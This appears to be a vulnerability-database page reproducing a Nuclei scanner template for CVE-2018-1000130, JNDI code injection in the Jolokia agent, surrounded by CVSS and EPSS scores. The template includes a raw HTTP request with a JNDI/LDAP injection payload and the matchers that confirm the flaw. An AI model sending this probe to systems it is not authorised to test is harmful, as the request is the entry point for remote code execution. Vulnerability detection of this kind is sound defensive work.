Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-1000130
HistoryJun 22, 2021 - 12:32 p.m.

Jolokia Agent - JNDI Code Injection

2021-06-2212:32:30
ProjectDiscovery
github.com
21

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

8.1 High

AI Score

Confidence

High

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.892 High

EPSS

Percentile

98.7%

Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
id: CVE-2018-1000130

info:
  name: Jolokia Agent - JNDI Code Injection
  author: milo2012
  severity: high
  description: |
    Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://access.redhat.com/errata/RHSA-2018:2669
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-1000130
    cwe-id: CWE-74
    epss-score: 0.89191
    epss-percentile: 0.98492
    cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jolokia
    product: webarchive_agent
  tags: cve2018,cve,jolokia,rce,jndi,proxy

http:
  - raw:
      - |
        POST /jolokia/read/getDiagnosticOptions HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
        Content-Type: application/x-www-form-urlencoded

        {
           "type":"read",
           "mbean":"java.lang:type=Memory",
           "target":{
              "url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
           }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"

      - type: status
        status:
          - 200
# digest: 490a0046304402202738b8f849e2ff4cc3b3029c5fa5990ddaa02ff6f7dd9d8bfc66cd4e143726e002205dda92656c7b74f10e3a011a74db4fb26e23385d8f5feb67eb0f5c111f526f12:922c64590222798bb761d5b6d8e72950

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

8.1 High

AI Score

Confidence

High

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.892 High

EPSS

Percentile

98.7%